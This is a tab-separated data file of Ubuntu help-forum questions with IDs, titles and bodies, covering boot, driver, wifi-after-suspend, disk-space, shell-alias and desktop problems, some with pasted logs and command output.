266808	ubuntu 12.10 python 2 how to switch from 'c > ' to ' > > > ' in terminal	im using python in the terminal and i switched from > > > to c > doing a demo . the problem being is im not told how to switch from 'c > ' back to ' > > > ' . i dont want to just close the terminal and 'kill ' the process entirely . im new and i hope someone gets a chuckle out of this but can maybe please help me out . thanks : d
266812	how do i authenticate over a domain while doing apt-get update ?	i am getting various 401 auth errors when trying to sudo apt-get update . i am connected to my corp vpn and have an ssh into my ubuntu machine . how can i authenticate using my network login/pw to complete 1 ) apt-get update and 2 ) updates to a newer dist ? : :snip : : w : failed to fetch http : //ca.archive.ubuntu.com/ubuntu/dists/oneiric-security/multiverse/source/sources 401 authorization required [ ip : 91.189.92.200 80 ] e : some index files failed to download . they have been ignored , or old ones used instead .
266817	comparing arbitrary revisions between branches using bazaar	given two branches , brancha and branchb , is there a syntax for comparing arbitrary revisions x of brancha with y of branchb ? for example : cd /path/to/brancha bzr diff -- new /path/to/branchb -rx this will show the differences between revision x of brancha and the head of branchb . is there a syntax to compare against revision y of branchb instead of the head ? as a workaround i can create a new branch branchb-y using -ry and then diff against that branch instead of branchb , but i would like to be able to diff directly without creating such temporary branches .
266822	grub is absent after re-installing windows xp	i formatted my xp drive and installed xp again , and now i ca n't boot into ubuntu . i just need the option of selecting ubuntu while the system boots . thanks in advance for replies .
266824	if i install ubuntu 12.04.1 will i receive all updates without upgrading to ubuntu 12.04.2 due to bumblebee issue ?	i ran into the problem with the bumblebee dependencies for the ubuntu 12.04.2 . to know more about the problem you can head to this thread ubuntu 12.04.2 wo n't boot after bumblebee instalation while my question is the following , if i install ubuntu 12.04.1 from old releases web site will i still receive all the updates excluding hardware stack from quantal ?
266825	what do i do when my root filesystem is full ?	my / folder is reading as full and i ca n't update software or do anything . not sure what i 'm doing wrong here . $ df -h results : filesystem size used avail use % mounted on /dev/sda1 5.7g 5.4g 0 100 % / udev 1.9g 4.0k 1.9g 1 % /dev tmpfs 770m 1.1m 769m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 1.9g 808k 1.9g 1 % /run/shm /dev/sda6 961m 18m 895m 2 % /tmp /dev/sda7 9.9g 2.9g 6.6g 31 % /home /dev/sda3 5.7g 140m 5.3g 3 % /usr/local /dev/sda4 2.9g 1.3g 1.4g 49 % /var /dev/sdb1 94g 1.3g 88g 2 % /sites /home/username/.private 9.9g 2.9g 6.6g 31 % /home/username /dev/sdb5 282g 88g 180g 33 % /mnt/multimedia $ df -h / results : filesystem size used avail use % mounted on /dev/sda1 5.7g 5.4g 0 100 % / $ du /mnt /media results : 4 /mnt/multimedia 8 /mnt 4 /media this is a new install of ubuntu 12.04 and i 'm not sure how/why the root system is so full .
266828	where is my ubuntu 12.10 ?	i have 4 partitions . 1 system part of windows . 2 windows installed ( 7 x64 ) . 3 i common drive for temp files . 4 my drive for my personal data . i downloaded ubuntu 12.10 x64 shrinked my windows drive about 10gb . burned ubuntu iso in pendrive by linux iso burner . booted in the pendrive , selected try ubuntu , selected install ubuntu there then i seleced -some thing else for -- ( how u want to install ubuntu ) i selected the drive -- add -- ext4 -- install ... .. then it said reboot.. i did so ... and after restart as pendrive is in it always get into the screen where the options says try ubuntu . install ubuntu . and 2 more options . so that time i remove the pd and restart the system . but when ever the system boots.. it boots directly into windows . inside windows i went to -- - run -- - msconfig -- - boot selection -- there is only windows ... no ubuntu detected ... so where is my ubuntu.. its disappeared after proper installation .
266833	everything has disappeared apart from the mouse pointer and desktop background	i had just entered these commands in the terminal : sudo service sudo service lightdm stop sudo apt-get install mesa- utils sudo service lightdm start then a black screen came on with battery check [ ok ] on it . nothing happened for so long i assumed it had crashed and so i turned my netbook off . when i turned it on again i was given a slightly different login screen , when i logged in everything was gone . pressing the super key does nothing but i am able to get a terminal up with ctrl+alt+t . no idea what i have done here or how to fix it ! any help here would be greatly appreciated ! edit : after typing unity & in the terminal this was shown [ terminal ] ( https : //pbs.twimg.com/media/bfjaydqciaavwiw.jpg ) don
266840	vsftp server configuraton in	i am going to develop a photo selling webapp , in that every user has options to upload there photos via ftp ( ubunut 10.04 + vsftpd ) , folder structure /var/www/project/downloads_ftp_folder /var/www/project/downloads_ftp_folder/user1_ftp_folder /var/www/project/downloads_ftp_folder/user2_ftp_folder /var/www/project/downloads_ftp_folder/user3_ftp_folder for every user i am creating ftp folder and group probelm is my strategy is correct or not , how to create a super user so that he can manage all ftp_folder ( eg user1_ftp_folder , user2_ftp_folder )
266842	how to install visual studio 2012 in ubuntu	please tell me the steps to install the visual studio 2012 in ubuntu for developing the .net framework program .
266844	firefox fails to open https : //youtube.com	i 'm using ubuntu 12.10 it 's fully updated . java & latest flash player that adobe released is installed , and i 'm using the nightly build of mozilla firefox 22.0a1 . my country filters websites like facebook.com and youtube.com , but my problem is n't that . i can open youtube in https [ video streaming wo n't function due to filtering ] but at least i can search the youtube . but when i use https in firefox it gives me : secure connection failed an error occurred during a connection to youtube.com . ssl received a record that exceeded the maximum permissible length . ( error code : ssl_error_rx_record_too_long ) the page you are trying to view can not be shown because the authenticity of the received data could not be verified . please contact the website owners to inform them of this problem . alternatively , use the command found in the help menu to report this broken site . my plugins and extensions are [ which i believe do n't have anything to do with my problem ] : omnibar , firebug , ghostery , dnt+ , adblock , adblock+ , flash video downloader , foxyproxy , liquid words , urlfixer .
266845	saw an interesting command but ca n't alias it	saw an command from this post http : //askubuntu.com/a/266839/75967 that i would like to alias find { , /usr } / { , s } bin -printf ' % f\0 ' | xargs -0 whatis | sort | less i assume the less or the | is interfering but how can i make the alias command ignore those characters that is causing it issues ? ie . this does n't work alias cccc='find { , /usr } / { , s } bin -printf ' % f\0 ' | xargs -0 whatis | sort | less' cccc it returns pell0modem-manager0airserv-ng0usermod0vipw0filefrag0update-software-center0ntpdate- debian0usbmuxd0foomatic-extract-text0cupsenable0dpkg-divert0dpkg-preconfigure0foomatic- getpjloptions0ldattach0hplj10200bccmd0vpnc-disconnect0madwifi- unload0cupsd0tcpd0hplj10180pppstats0service0update-icon-caches0atieventsd0hpljp15050grub- set-default0userdel0arpd0gpsdctl0remove-shell0cpgr0winbindd0cracklib-format0update-catalog0wesside-ng0vmware-authdlauncher0aireplay-ng0install-docs0hciattach0lpc0install-menu0ck-log-system-restart0foomatic-printermap-to-gutenprint-xml0setvesablank0gconf-schemas0airmon-ng0zic0update-apt-xapian-index0pm-suspend0rebuild- instead of [ ( 1 ) - check file types and compare values 2to3 ( 1 ) - python2 to python3 converter 2to3-2.7 ( 1 ) - python2 to python3 converter 2to3-3.2 ( 1 ) - python2 to python3 converter 411toppm ( 1 ) - convert sony mavica .411 image to ppm 7z ( 1 ) - a file archiver with highest compression ratio 7za ( 1 ) - a file archiver with highest compression ratio a2p ( 1 ) - awk to perl translator accept ( 2 ) - accept a connection on a socket accessdb ( 8 ) - dumps the content of a man-db database in a human read ... aclocal-1.11 ( 1 ) - manual page for aclocal 1.11.6 aclocal ( 1 ) - manual page for aclocal 1.11.3 when you execute the command by itself . after the fact - supplemental i also added another useful function for myself to query via a string against that catalogue of commands . fff ( ) { find { , /usr } / { , s } bin -printf ' % f\0 ' | xargs -0 whatis | & grep $ 1 } so if you type the command fff pdf it will show you all the related commands about pdf like this pdfunite ( 1 ) - portable document format ( pdf ) page merger ps2pdf13 ( 1 ) - convert postscript to pdf 1.3 ( acrobat 4-and-later com ... pdftotext ( 1 ) - portable document format ( pdf ) to text converter ( vers ... ps2pdfwr ( 1 ) - convert postscript to pdf without specifying compatibi ... pdfdetach ( 1 ) - portable document format ( pdf ) document embedded file ... ps2pdf ( 1 ) - convert postscript to pdf using ghostscript ps2pdf12 ( 1 ) - convert postscript to pdf 1.2 ( acrobat 3-and-later com ... pdf2dsc ( 1 ) - generate a postscript page list of a pdf document pdfimages ( 1 ) - portable document format ( pdf ) image extractor ( versio ... pdftoppm ( 1 ) - portable document format ( pdf ) to portable pixmap ( ppm ... foomatic-ppdfile ( 1 ) - generate a ppd file for a given printer/driver combo dvipdf ( 1 ) - convert tex dvi file to pdf using ghostscript and dvips qpdf ( 1 ) - pdf transformation software pdftocairo ( 1 ) - portable document format ( pdf ) to png/jpeg/pdf/ps/eps/ ... pdfseparate ( 1 ) - portable document format ( pdf ) page extractor pdftops ( 1 ) - portable document format ( pdf ) to postscript converter ... ps2pdf14 ( 1 ) - convert postscript to pdf 1.4 ( acrobat 5-and-later com ... pdfinfo ( 1 ) - portable document format ( pdf ) document information ex ... pdftohtml ( 1 ) - program to convert pdf files into html , xml and png im ... pdfopt ( 1 ) - ghostscript pdf optimizer pdffonts ( 1 ) - portable document format ( pdf ) font analyzer ( version ... pdf2ps ( 1 ) - ghostscript pdf to postscript translator i think this is kind of useful for knowing all the commands that are available
266852	pdf file renaming according to metadata ?	is there something i can use that renames pdf files according to their content ? basically an equivalent of http : //macscripter.net/viewtopic.php ? id=27620 in ubuntu .
266857	ubuntu 12.04 : wifi not working after suspension	here is my configuration : - s.o . : ubuntu 12.04 - kernel : 3.5.0-25 - laptop : sony vaio vgn-fz21e - wifi car : intel pro/wireless 3945abg [ golan ] - driver : iwl3945 after suspension my wifi is n't working , even restarting network or reloading modules . it seems simply that the card is switched off and ubuntu can not communicate with it . i thought this as i had a look into /var/log/syslog and i 've found this : mar 11 17:33:25 pablo-laptop kernel : [ 5225.608061 ] sky2 0000:08:00.0 : eth0 : disabling interface mar 11 17:33:25 pablo-laptop kernel : [ 5225.619189 ] sky2 0000:08:00.0 : eth0 : enabling interface mar 11 17:33:25 pablo-laptop kernel : [ 5225.619706 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready mar 11 17:33:26 pablo-laptop kernel : [ 5226.637161 ] iwl3945 0000:06:00.0 : bsm ucode verification failed at addr 0x00003800+0 ( of 900 ) , is 0xffffffff , s/b 0xf802020 mar 11 17:33:26 pablo-laptop kernel : [ 5226.637171 ] iwl3945 0000:06:00.0 : unable to set up bootstrap ucode : -5 mar 11 17:33:26 pablo-laptop kernel : [ 5226.764525 ] iwl3945 0000:06:00.0 : bsm ucode verification failed at addr 0x00003800+0 ( of 900 ) , is 0xffffffff , s/b 0xf802020 mar 11 17:33:26 pablo-laptop kernel : [ 5226.764531 ] iwl3945 0000:06:00.0 : unable to set up bootstrap ucode : -5 mar 11 17:33:26 pablo-laptop kernel : [ 5226.891926 ] iwl3945 0000:06:00.0 : bsm ucode verification failed at addr 0x00003800+0 ( of 900 ) , is 0xffffffff , s/b 0xf802020 mar 11 17:33:26 pablo-laptop kernel : [ 5226.891932 ] iwl3945 0000:06:00.0 : unable to set up bootstrap ucode : -5 mar 11 17:33:26 pablo-laptop kernel : [ 5227.019321 ] iwl3945 0000:06:00.0 : bsm ucode verification failed at addr 0x00003800+0 ( of 900 ) , is 0xffffffff , s/b 0xf802020 mar 11 17:33:26 pablo-laptop kernel : [ 5227.019326 ] iwl3945 0000:06:00.0 : unable to set up bootstrap ucode : -5 mar 11 17:33:26 pablo-laptop kernel : [ 5227.146696 ] iwl3945 0000:06:00.0 : bsm ucode verification failed at addr 0x00003800+0 ( of 900 ) , is 0xffffffff , s/b 0xf802020 mar 11 17:33:26 pablo-laptop kernel : [ 5227.146701 ] iwl3945 0000:06:00.0 : unable to set up bootstrap ucode : -5 mar 11 17:33:26 pablo-laptop kernel : [ 5227.147044 ] iwl3945 0000:06:00.0 : unable to initialize device after 5 attempts . mar 11 17:33:31 pablo-laptop kernel : [ 5231.965726 ] iwl3945 0000:06:00.0 : bsm ucode verification failed at addr 0x00003800+0 ( of 900 ) , is 0xffffffff , s/b 0xf802020 mar 11 17:33:31 pablo-laptop kernel : [ 5231.965735 ] iwl3945 0000:06:00.0 : unable to set up bootstrap ucode : -5 mar 11 17:33:31 pablo-laptop kernel : [ 5232.093091 ] iwl3945 0000:06:00.0 : bsm ucode verification failed at addr 0x00003800+0 ( of 900 ) , is 0xffffffff , s/b 0xf802020 mar 11 17:33:31 pablo-laptop kernel : [ 5232.093097 ] iwl3945 0000:06:00.0 : unable to set up bootstrap ucode : -5 mar 11 17:33:31 pablo-laptop kernel : [ 5232.220442 ] iwl3945 0000:06:00.0 : bsm ucode verification failed at addr 0x00003800+0 ( of 900 ) , is 0xffffffff , s/b 0xf802020 mar 11 17:33:31 pablo-laptop kernel : [ 5232.220447 ] iwl3945 0000:06:00.0 : unable to set up bootstrap ucode : -5 mar 11 17:33:32 pablo-laptop kernel : [ 5232.347782 ] iwl3945 0000:06:00.0 : bsm ucode verification failed at addr 0x00003800+0 ( of 900 ) , is 0xffffffff , s/b 0xf802020 mar 11 17:33:32 pablo-laptop kernel : [ 5232.347787 ] iwl3945 0000:06:00.0 : unable to set up bootstrap ucode : -5 mar 11 17:33:32 pablo-laptop kernel : [ 5232.475196 ] iwl3945 0000:06:00.0 : bsm ucode verification failed at addr 0x00003800+0 ( of 900 ) , is 0xffffffff , s/b 0xf802020 mar 11 17:33:32 pablo-laptop kernel : [ 5232.475201 ] iwl3945 0000:06:00.0 : unable to set up bootstrap ucode : -5 mar 11 17:33:32 pablo-laptop kernel : [ 5232.475555 ] iwl3945 0000:06:00.0 : unable to initialize device after 5 attempts . mar 11 17:33:36 pablo-laptop kernel : [ 5236.981027 ] iwl3945 0000:06:00.0 : bsm ucode verification failed at addr 0x00003800+0 ( of 900 ) , is 0xffffffff , s/b 0xf802020 mar 11 17:33:36 pablo-laptop kernel : [ 5236.981040 ] iwl3945 0000:06:00.0 : unable to set up bootstrap ucode : -5 mar 11 17:33:36 pablo-laptop kernel : [ 5237.111258 ] iwl3945 0000:06:00.0 : bsm ucode verification failed at addr 0x00003800+0 ( of 900 ) , is 0xffffffff , s/b 0xf802020 mar 11 17:33:36 pablo-laptop kernel : [ 5237.111267 ] iwl3945 0000:06:00.0 : unable to set up bootstrap ucode : -5 mar 11 17:33:37 pablo-laptop kernel : [ 5237.241510 ] iwl3945 0000:06:00.0 : bsm ucode verification failed at addr 0x00003800+0 ( of 900 ) , is 0xffffffff , s/b 0xf802020 mar 11 17:33:37 pablo-laptop kernel : [ 5237.241517 ] iwl3945 0000:06:00.0 : unable to set up bootstrap ucode : -5 mar 11 17:33:37 pablo-laptop kernel : [ 5237.371699 ] iwl3945 0000:06:00.0 : bsm ucode verification failed at addr 0x00003800+0 ( of 900 ) , is 0xffffffff , s/b 0xf802020 mar 11 17:33:37 pablo-laptop kernel : [ 5237.371706 ] iwl3945 0000:06:00.0 : unable to set up bootstrap ucode : -5 mar 11 17:33:37 pablo-laptop kernel : [ 5237.501865 ] iwl3945 0000:06:00.0 : bsm ucode verification failed at addr 0x00003800+0 ( of 900 ) , is 0xffffffff , s/b 0xf802020 mar 11 17:33:37 pablo-laptop kernel : [ 5237.501873 ] iwl3945 0000:06:00.0 : unable to set up bootstrap ucode : -5 mar 11 17:33:37 pablo-laptop kernel : [ 5237.502352 ] iwl3945 0000:06:00.0 : unable to initialize device after 5 attempts . mar 11 17:33:44 pablo-laptop kernel : [ 5245.165294 ] iwl3945 0000:06:00.0 : bsm ucode verification failed at addr 0x00003800+0 ( of 900 ) , is 0xffffffff , s/b 0xf802020 mar 11 17:33:44 pablo-laptop kernel : [ 5245.165302 ] iwl3945 0000:06:00.0 : unable to set up bootstrap ucode : -5 mar 11 17:33:45 pablo-laptop kernel : [ 5245.292676 ] iwl3945 0000:06:00.0 : bsm ucode verification failed at addr 0x00003800+0 ( of 900 ) , is 0xffffffff , s/b 0xf802020 mar 11 17:33:45 pablo-laptop kernel : [ 5245.292681 ] iwl3945 0000:06:00.0 : unable to set up bootstrap ucode : -5 mar 11 17:33:45 pablo-laptop kernel : [ 5245.420165 ] iwl3945 0000:06:00.0 : bsm ucode verification failed at addr 0x00003800+0 ( of 900 ) , is 0xffffffff , s/b 0xf802020 mar 11 17:33:45 pablo-laptop kernel : [ 5245.420171 ] iwl3945 0000:06:00.0 : unable to set up bootstrap ucode : -5 mar 11 17:33:45 pablo-laptop kernel : [ 5245.547518 ] iwl3945 0000:06:00.0 : bsm ucode verification failed at addr 0x00003800+0 ( of 900 ) , is 0xffffffff , s/b 0xf802020 mar 11 17:33:45 pablo-laptop kernel : [ 5245.547523 ] iwl3945 0000:06:00.0 : unable to set up bootstrap ucode : -5 mar 11 17:33:45 pablo-laptop kernel : [ 5245.675049 ] iwl3945 0000:06:00.0 : bsm ucode verification failed at addr 0x00003800+0 ( of 900 ) , is 0xffffffff , s/b 0xf802020 mar 11 17:33:45 pablo-laptop kernel : [ 5245.675054 ] iwl3945 0000:06:00.0 : unable to set up bootstrap ucode : -5 mar 11 17:33:45 pablo-laptop kernel : [ 5245.675425 ] iwl3945 0000:06:00.0 : unable to initialize device after 5 attempts . after upgrading the kernel to 3.5.0-25 , i noticed a new module named iwlwifi , which is also present in syslog and he seems to have a dialog with wireless card : mar 12 09:48:16 pablo-laptop kernel : [ 209.569037 ] iwlwifi : intel ( r ) wireless wifi link agn driver for linux , in-tree : mar 12 09:48:16 pablo-laptop kernel : [ 209.569044 ] iwlwifi : copyright ( c ) 2003-2012 intel corporation mar 12 09:49:05 pablo-laptop kernel : kernel logging ( proc ) stopped . any idea ? ! 2013.03.12 here is the output of lspci -nn | grep 0280 : 06:00.0 network controller [ 0280 ] : intel corporation pro/wireless 3945abg [ golan ] network connection [ 8086:4222 ] ( rev 02 ) command ls /etc/modprobe.d | grep iwl gave anything ... . 2013.03.13 iwlwifi was not present in /etc/modules , and was successfully added to /etc/modprobe.d/blacklist.conf . i tried to suspend and resume for three times , but the 4th time the problem occurred . p.s . the same problem happened with kernel 3.2 , where iwlwifi was not present . important : upgrade manager is advising me to install 'network management framework ( common files for wifi and mobile ) ' and 'network management framework ( gnome dialogs for wifi and mobile ) ' . should i install them ? what do they do exaclty ? can affect my problem ? 2013.03.14 added the following line in file /etc/pm/config.d/config suspend_modules= '' iwl3945 '' after some successfull tests , the problem occurred with new error messagges in syslog : iwl3945 0000:06:00.0 : bad eeprom signature , eeprom_gp=0x00000007 iwl3945 0000:06:00.0 : eeprom not found , eeprom_gp=0xffffffff iwl3945 0000:06:00.0 : unable to init eeprom iwl3945 : probe of 0000:06:00.0 failed with error -2 then i did another test , which was successfull , and these are the messages in syslog : cfg80211 : calling crda to update world regulatory domain cfg80211 : world regulatory domain updated : cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) cfg80211 : ( 2457000 khz - 2482000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) iwl3945 : intel ( r ) pro/wireless 3945abg/bg network connection driver for linux , in-tree : s iwl3945 : copyright ( c ) 2003-2011 intel corporation iwl3945 0000:06:00.0 : tunable channels : 13 802.11bg , 23 802.11a channels iwl3945 0000:06:00.0 : detected intel wireless wifi link 3945abg iwl3945 0000:06:00.0 : irq 48 for msi/msi-x registered led device : phy0-led cfg80211 : ignoring regulatory request set by core since the driver uses its own custom regulatory domain ieee80211 phy0 : selected rate control algorithm 'iwl-3945-rs' iwl3945 0000:06:00.0 : loaded firmware version 15.32.2.9 2013.03.18 problem occurred again , and i 've noticed a trace called in syslog : mar 18 09:39:31 pablo-laptop kernel : [ 18048.564008 ] pid : 3535 , comm : modprobe tainted : p o 3.5.0-25-generic # 39~precise1-ubuntu mar 18 09:39:31 pablo-laptop kernel : [ 18048.564008 ] call trace : mar 18 09:39:31 pablo-laptop kernel : [ 18048.564008 ] [ < c1045c62 > ] warn_slowpath_common+0x72/0xa0 mar 18 09:39:31 pablo-laptop kernel : [ 18048.564008 ] [ < f887d986 > ] ? _il_grab_nic_access+0x96/0xa0 [ iwlegacy ] mar 18 09:39:31 pablo-laptop kernel : [ 18048.564008 ] [ < f887d986 > ] ? _il_grab_nic_access+0x96/0xa0 [ iwlegacy ] mar 18 09:39:31 pablo-laptop kernel : [ 18048.564008 ] [ < c1045d33 > ] warn_slowpath_fmt+0x33/0x40 mar 18 09:39:31 pablo-laptop kernel : [ 18048.564008 ] [ < f887d986 > ] _il_grab_nic_access+0x96/0xa0 [ iwlegacy ] mar 18 09:39:31 pablo-laptop kernel : [ 18048.564008 ] [ < f887dac2 > ] il_wr_prph+0x32/0x90 [ iwlegacy ] mar 18 09:39:31 pablo-laptop kernel : [ 18048.564008 ] [ < f887dc79 > ] il_apm_init+0x159/0x1d0 [ iwlegacy ] mar 18 09:39:31 pablo-laptop kernel : [ 18048.564008 ] [ < f88c44b5 > ] il3945_apm_init+0x15/0x130 [ iwl3945 ] mar 18 09:39:31 pablo-laptop kernel : [ 18048.564008 ] [ < f887f085 > ] il_eeprom_init+0x45/0x1b0 [ iwlegacy ] mar 18 09:39:31 pablo-laptop kernel : [ 18048.564008 ] [ < c12f2daa > ] ? pci_bus_write_config_byte+0x5a/0x70 mar 18 09:39:31 pablo-laptop kernel : [ 18048.564008 ] [ < f88c2e9d > ] il3945_pci_probe+0x19d/0x4b0 [ iwl3945 ] mar 18 09:39:31 pablo-laptop kernel : [ 18048.564008 ] [ < c13bdbe5 > ] ? pm_runtime_enable+0x45/0x70 mar 18 09:39:31 pablo-laptop kernel : [ 18048.564008 ] [ < c12fa4b7 > ] local_pci_probe+0x47/0xb0 mar 18 09:39:31 pablo-laptop kernel : [ 18048.564008 ] [ < c12fba08 > ] pci_device_probe+0x68/0x90 mar 18 09:39:31 pablo-laptop kernel : [ 18048.564008 ] [ < c11b3077 > ] ? sysfs_create_link+0x17/0x20 mar 18 09:39:31 pablo-laptop kernel : [ 18048.564008 ] [ < c13b5201 > ] really_probe+0x51/0x1c0 mar 18 09:39:31 pablo-laptop kernel : [ 18048.564008 ] [ < c13bf099 > ] ? pm_runtime_barrier+0x49/0xb0 mar 18 09:39:31 pablo-laptop kernel : [ 18048.564008 ] [ < c13b54aa > ] driver_probe_device+0x3a/0x60 mar 18 09:39:31 pablo-laptop kernel : [ 18048.564008 ] [ < c13b5561 > ] __driver_attach+0x91/0xa0 mar 18 09:39:31 pablo-laptop kernel : [ 18048.564008 ] [ < c13b54d0 > ] ? driver_probe_device+0x60/0x60 mar 18 09:39:31 pablo-laptop kernel : [ 18048.564008 ] [ < c13b3c12 > ] bus_for_each_dev+0x42/0x70 mar 18 09:39:31 pablo-laptop kernel : [ 18048.564008 ] [ < c13b4ee1 > ] driver_attach+0x21/0x30 mar 18 09:39:31 pablo-laptop kernel : [ 18048.564008 ] [ < c13b54d0 > ] ? driver_probe_device+0x60/0x60 mar 18 09:39:31 pablo-laptop kernel : [ 18048.564008 ] [ < c13b4b47 > ] bus_add_driver+0x187/0x260 mar 18 09:39:31 pablo-laptop kernel : [ 18048.564008 ] [ < c12fba30 > ] ? pci_device_probe+0x90/0x90 mar 18 09:39:31 pablo-laptop kernel : [ 18048.564008 ] [ < c13b5a16 > ] driver_register+0x66/0x110 mar 18 09:39:31 pablo-laptop kernel : [ 18048.564008 ] [ < c12fb7d2 > ] __pci_register_driver+0x42/0xa0 mar 18 09:39:31 pablo-laptop kernel : [ 18048.564008 ] [ < f8853050 > ] il3945_init+0x50/0x1000 [ iwl3945 ] mar 18 09:39:31 pablo-laptop kernel : [ 18048.564008 ] [ < c103b80f > ] ? set_memory_nx+0x5f/0x70 mar 18 09:39:31 pablo-laptop kernel : [ 18048.564008 ] [ < c1003034 > ] do_one_initcall+0x34/0x170 mar 18 09:39:31 pablo-laptop kernel : [ 18048.564008 ] [ < f8853000 > ] ? 0xf8852fff mar 18 09:39:31 pablo-laptop kernel : [ 18048.564008 ] [ < c10a544d > ] sys_init_module+0xad/0x210 mar 18 09:39:31 pablo-laptop kernel : [ 18048.564008 ] [ < c11519d3 > ] ? sys_close+0x73/0xc0 mar 18 09:39:31 pablo-laptop kernel : [ 18048.564008 ] [ < c15ea8df > ] sysenter_do_call+0x12/0x28 mar 18 09:39:31 pablo-laptop kernel : [ 18048.564008 ] -- - [ end trace f7ec9f13abaf4b1b ] -- - mar 18 09:39:31 pablo-laptop kernel : [ 18048.692242 ] iwl3945 0000:06:00.0 : bad eeprom signature , eeprom_gp=0x00000007 mar 18 09:39:31 pablo-laptop kernel : [ 18048.692249 ] iwl3945 0000:06:00.0 : eeprom not found , eeprom_gp=0xffffffff mar 18 09:39:31 pablo-laptop kernel : [ 18048.692283 ] iwl3945 0000:06:00.0 : unable to init eeprom mar 18 09:39:31 pablo-laptop kernel : [ 18048.692467 ] iwl3945 : probe of 0000:06:00.0 failed with error -2
266858	will any graphics card work ?	i am looking into getting a cheap video card . i am currently looking at getting the evga nvidia geforce 210 pci-e graphics card - 1 gb . would this would with ubuntu 12.10 and then later 13.04 and if so , how would i install the driver ? thanks
266865	how to open .docx files on ubuntu ?	i am unable to view images in .docx on ubuntu . i have ubuntu 10.10 and openoffice.org 3.2.1 ( ooo-build 3.2.1.4 , ubuntu package 1:3.2.1-7ubuntu1.1 ) is there any tool to read .docx ? please note that i do not have access to google drive and can not use any related tools . i tried to use docxv.exe with wine , in vain .
266867	ubuntu 12.04 lts terminal removed	i have been using wine for a while now but it started showing some problems a few days ago so i used this command to remove it sudo apt-get purge wine\* now my system has none of the in built programs such as the terminal of the software center . what can i do to get them back apart from re installing ubuntu ?
266868	how do i change the colors of a gedit theme ?	i do n't know what i 'm doing wrong . i 'm using a custom theme called twilight for gedit and i 'm trying to change some of the colors of the theme . i went to : /home/user/.local/share/gedit/twilight.xml the default color i 'm trying to change is : < color name= '' steelblue3 '' value= '' # 4f94cd '' / > to < color name= '' moon_grey '' value= '' # f7f7f7 '' > the code i 'm changing : < style name= '' bracket-match '' background= '' steelblue3 '' / > to this : < style name= '' bracket-match '' background= '' moon_grey '' / > but after i do use the line above , nothing happens . it still comes out as steel blue . i exited out completely and came back in and it was still the same color . i also tried `` reseting '' but repicking the theme in the preferences > fonts & colors but nothing happened again . i also deleted the steel blue line but even than it stayed as is . what 's going on ? how do i change a color of the theme ? update i restarted the computer and things have changed . i have 2 files now - the regular twilight.xml and another twilight.xml~ file . i can not open twilight.xml~ as it gives me the error : could not display `` /home/user/.local/share/gedit/styles/twilight.xml~ '' . but i can click on the regular file . my changes are still there but it switched to a different theme and the twilight theme is unavailable in the preferences . what happened to it ?
266869	how can i make an amd/intel switchable graphics system work ?	i used my hp probook 4530s ( 6490m + hd3000 graphics ) laptop with ubuntu 12.04 , but its battery life is too much poor . it lasted one and half hour whereas in windowns7 it lasted 3-4 hours . for using outside with unplugged , i decide to use ati switchable graphics . i have already installed catalyst properly , then applied these instructions . there were no errors while following them and my battery then lasted 3-4 hours . but when i rebooted my laptop , ubuntu loading screen was stuck and not responding could not access login page . when i switched off the ati via the computer bios i was able to boot . for windows7 i must to use ati because of gaming so i do n't want to have to change that every time in the bios . what can i do about to make switchable graphics work properly ?
266871	ubuntu automatically logs in as gdm how do i stop this ?	not sure what i did but as of this morning ubuntu on my imac has been auto logging in as gdm . i 've tried the following remedies reinstall lightdm and ubuntu-desktop delete auto-login and set auto-login-guest=false on /etc/gdm/custom.conf and /etc/lightdm/lightdm.conf set up a new user with identical permissions to my old one and try and re-login with that . upgrade to roaring-ringtail beta ( i have nautilus 3.7.1 installed and i wondered if this might have had something to do with it ) wierdly one of the effects is that when i open a terminal it opens and then disappears . i have to go to the tty terminal using alt-ctrl-f2 to make any changes . not too sure what files i need to post to help resolve this , but would appreciate any help . edit : the home directory for gdm is /var/lib/gdm ( not sure if this helps )
266872	ubuntu lts 12.04 has suddenly become very slow for me today	i am using 12.04 lts release for past 4 months and was fine with it , until just now the os is unresponsive in all the applications ( browser , opening of folders etc ) . then i read some of the related posts here regarding updating nvidia graphics driver . i checked my driver its intel and not nvidia . presently i am applying changes after installing through the update manager , but it seems the application of changes is taking forever even for 21mb of update ! ! ! along with that lts keep running slow ! ! ? do i have any option to wait for these update to get applied ? will the response improves after update ? the only noticeable thing i noticed before my system gone bad was that update manager prompted me to install some update packages which will update to 12.04.2 from current 12.04.2 ?
266874	mouse and touchpad freeze without power supply	i have a fresh installed ubuntu 12.04 lts on my hp probook . my external mouse and touchpad freeze in battery mode , but i can reinitialize them with ctrl+alt+1 and back to 7 . as long as i move the mouse everything is fine . but not touching the mouse for one second will freeze it . i could solve the problem for my touchpad putting these two lines into rc.local : sudo modprobe -r psmouse sudo modprobe psmouse proto=imps but i have no solution for my external wired mouse . how to fix it ?
266875	are there any free landscape alternatives ?	is there a free alternative to landscape for the management of network client ?
266876	how can i make unity dock notifications more visible ?	by default dock icons of applications where something is going on have a very faint glow effect . is there any way to make them stand out more ? like jump around , have a colored arrow or something like that ?
266877	why do i get an `` operation not permitted '' error when running duplicity as sudo ?	currently i 'm backing up my /home/ folder to a usb mounted on /media/liamzebedee/x using duplicity . when i go to restore the folder to the usb however ( using sudo ) , i get the error - error ' [ errno 1 ] operation not permitted : '/media/liamzebedee/x/home '' processing . the files are all restored , why do i get this error ?
